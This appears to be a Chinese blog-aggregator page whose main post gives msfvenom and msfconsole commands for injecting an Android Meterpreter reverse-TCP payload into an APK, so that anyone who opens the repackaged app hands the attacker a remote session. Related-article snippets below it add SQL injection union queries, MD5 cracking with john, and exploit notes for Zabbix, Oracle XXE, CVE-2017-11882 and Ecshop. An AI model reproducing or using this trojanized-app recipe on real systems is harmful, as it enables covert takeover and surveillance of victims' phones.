msf向存在漏洞的apk注入payload

命令：msfvenom -x /路径/apk -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口

只要别人一打开这个被注入payload后的软件就可以获得meterpreter

当然你要启动msfconsole监听

msfconsole

haled模块

set LHOSST 127.0.0.1

set LPORT 你设置的端口

set PAYLOAD android/meterpreter/reverse_tcp

exploit

时间： 2024-10-12 04:33:02

msf向存在漏洞的apk注入payload的相关文章

msfvenom向apk注入payload

首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> -o /存放路径/注入成功的apk名字开启监听 halder模块 set PAYLOAD android/meterpreter/reverse_tcp set LHOST <ip> set LPORT

【安全牛学习笔记】手动漏洞挖掘-SQL注入

[email protected]:~# john --format=raw-MD5 dvwa.txt [email protected]:~# cd .john/ [email protected]:~/.john# ls john.log john.pot [email protected]:~/.john# cat john.log [email protected]:~/.john# cat john.pot [email protected]:~/.john# rm *

WEB安全：XSS漏洞与SQL注入漏洞介绍及解决方案

对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门参考大量前辈们的心得,小小的总结一下,欢迎大家拍砖啊一.跨站脚本攻击(XSS) 跨站脚本攻击的原理 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时

破解APK注入代码大揭秘

点此了解详细的APK破解及二次打包过程揭秘: http://t.cn/RzEn7UK [HACK]破解APK并注入自己的代码会破解是你的本事,但是请不要去干坏事! 使用工具: APKTool 提醒:能够正常安装到手机上的APK都是带有签名的(不了解签名的可以百度),APK在破解重新打包后是已经不再拥有签名的,如果想要你破解后的APK能够正常运行请重新签名. apk其实也就是一个压缩包.我们来看看里边都有什么吧?如下图: META-INF 是存放签名的文件夹,这里我们不做过头的解释 Res是存放

手动漏洞挖掘-SQL注入(安全牛笔记)

substring_index(USER(),"@",l)-- #是将查询出来的结果进行切分,以@符号的方式切分 ' union select table_name,table_schema from information_schema.tables-- + #查询数据库中所有的库表查询所有数据库,数据表: http://192.168.100.129/dvwa/vulnerabilities/sqli/ ?id='+union+select+table_name,table_sc

Zabbix-20160817-高危SQL注入漏洞

漏洞概述: zabbix是一个开源的企业级性能监控解决方案.近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限. 但是无需登录注入这里有个前提,就是zabbix开启了guest权限.而在zabbix中,guest的默认密码为空.需要有这个条件的支持才可以进行无权限注入. 影响程度: 攻击成本:低危害程度:高是否登陆:不需要影响范

Oracle数据库XXE注入漏洞(CVE-2014-6577)分析

在这篇文中,我们将共同分析一下Oracle数据库的XXE注入漏洞(CVE-2014-6577),Oracle公司1月20日发布了针对该漏洞的相关补丁. 有关XXE的相关知识,可以查看安全脉搏站内的另一篇文章<未知攻焉知防--XXE漏洞攻防>. 漏洞描述 Oracle数据库的XML解析器模块容易受到XML外部实体(XML External Entity , XXE)注入. 受影响版本:11.2.0.3, 11.2.0.4, 12.1.0.1 和12.1.0.2 所需权限:创建会话(CREATE

CVE-2017-11882漏洞 Msf利用复现

中午时候收到了推送的漏洞预警,在网上搜索相关信息看到很多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的利用. 0x00 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882).该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本.攻击者可以利用漏洞以当前登录的用户的身份执行任意命令. 由于漏洞影响

20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞(附实战exp)

Ecshop 2.x/3.x SQL注入/任意代码执行漏洞影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行. 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响